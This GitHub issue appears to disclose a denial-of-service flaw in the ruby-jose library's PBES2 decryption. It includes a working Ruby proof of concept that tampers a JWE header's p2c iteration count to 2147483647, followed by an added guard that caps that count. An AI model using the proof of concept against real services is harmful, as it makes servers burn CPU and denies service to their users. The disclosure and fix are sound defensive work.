ruby-jose
Security: billion hashes attack on PBES2
Hi there,
This attack was recently described in a Black Hat 2023 presentation: Three New Attacks Against JSON Web Tokens.
In short, with an attacker-controlled p2c value, they can invoke a DoS attack by specifying a very large iteration count. The PBES2-HS256+A128KW, PBES2-HS384+A192KW, and PBES2-HS512+A256KW encryption modes are susceptible to this attack. Here's a demo using the jose library:
```ruby
require "base64"
require "json"
require "jose"

jwk_secret = JOSE::JWK.from_oct("secret")
jwe = { "alg" => "PBES2-HS256+A128KW", "enc" => "A128GCM" }
encrypted_pbes2hs256a128kw = JOSE::JWE.block_encrypt(jwk_secret, "{}", jwe).compact
puts encrypted_pbes2hs256a128kw

# The protected header is the first base64url segment of the compact JWE.
encrypted_fields = encrypted_pbes2hs256a128kw.split(".")
header = Base64.urlsafe_decode64(encrypted_fields.first)
puts header

parsed = JSON.parse(header)
puts parsed["p2c"]
parsed["p2c"] = 2147483647 # PBES2 iteration count, set to a huge value
puts parsed["p2c"]

new_header = parsed.to_json
puts new_header
header_64 = Base64.urlsafe_encode64(new_header, padding: false)
# Reassemble the token with the tampered header; the other segments are unchanged.
new_encrypted_pbes2hs256a128kw = ([header_64] + encrypted_fields[1..-1]).join(".")
puts new_encrypted_pbes2hs256a128kw

puts "Decrypting..."
# The library runs p2c PBKDF2 iterations to derive the wrapping key before
# it is able to notice that the header was tampered with.
JOSE::JWE.block_decrypt(jwk_secret, new_encrypted_pbes2hs256a128kw).first
```
This attack resulted in CVE-2022-36083 in a similar JavaScript JOSE library.
Here's how the JS library fixed it: https://github.com/panva/jose/commit/03d6d013bf6e070e85adfe5731f526978e3e8e4d
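An added example (not code from this issue or from ruby-jose) of the kind of guard the linked fix applies: it parses the protected header of a compact JWE and refuses a PBES2 token whose p2c is missing, malformed, or above a cap, so the check runs before any PBKDF2 work. The cap value, the function names and the dummy token segments are assumptions.

```ruby
require "base64"
require "json"
# Added example, not ruby-jose code: run check_pbes2_count! on the compact
# string before JOSE::JWE.block_decrypt so an attacker-supplied p2c cannot
# drive an unbounded PBKDF2 loop. The 10_000 cap is an assumed policy value.
MAX_PBES2_COUNT = 10_000
PBES2_ALGS = %w[PBES2-HS256+A128KW PBES2-HS384+A192KW PBES2-HS512+A256KW].freeze

class UnsafeJWEHeader < StandardError; end

# Parses the protected header (first segment) of a compact JWE, raising on
# anything other than five segments with a base64url JSON object in front.
def protected_header(compact_jwe)
  parts = compact_jwe.split(".", -1)
  raise UnsafeJWEHeader, "expected 5 segments, got #{parts.size}" unless parts.size == 5
  header = JSON.parse(Base64.urlsafe_decode64(parts[0]))
  raise UnsafeJWEHeader, "protected header is not a JSON object" unless header.is_a?(Hash)
  header
rescue ArgumentError, JSON::ParserError => e
  raise UnsafeJWEHeader, "malformed protected header: #{e.message}"
end

# Refuses a PBES2 token whose p2c is missing, not a positive integer, or above
# the cap; non-PBES2 algorithms pass through. Returns the header on success.
def check_pbes2_count!(compact_jwe, max_count: MAX_PBES2_COUNT)
  header = protected_header(compact_jwe)
  return header unless PBES2_ALGS.include?(header["alg"])
  p2c = header["p2c"]
  unless p2c.is_a?(Integer) && p2c > 0
    raise UnsafeJWEHeader, "p2c must be a positive integer, got #{p2c.inspect}"
  end
  raise UnsafeJWEHeader, "p2c=#{p2c} exceeds limit #{max_count}" if p2c > max_count
  header
end

def safe_to_decrypt?(compact_jwe)
  check_pbes2_count!(compact_jwe)
  true
rescue UnsafeJWEHeader
  false
end

# Constructed sample token: only the header matters to the check, so the
# encrypted key, IV, ciphertext and tag segments are dummy base64url strings.
def sample_jwe(p2c, alg: "PBES2-HS256+A128KW")
  header = { "alg" => alg, "enc" => "A128GCM", "p2s" => "c2FsdA", "p2c" => p2c }
  ([Base64.urlsafe_encode64(header.to_json, padding: false)] + %w[ZWs aXY Y3Q dGFn]).join(".")
end
```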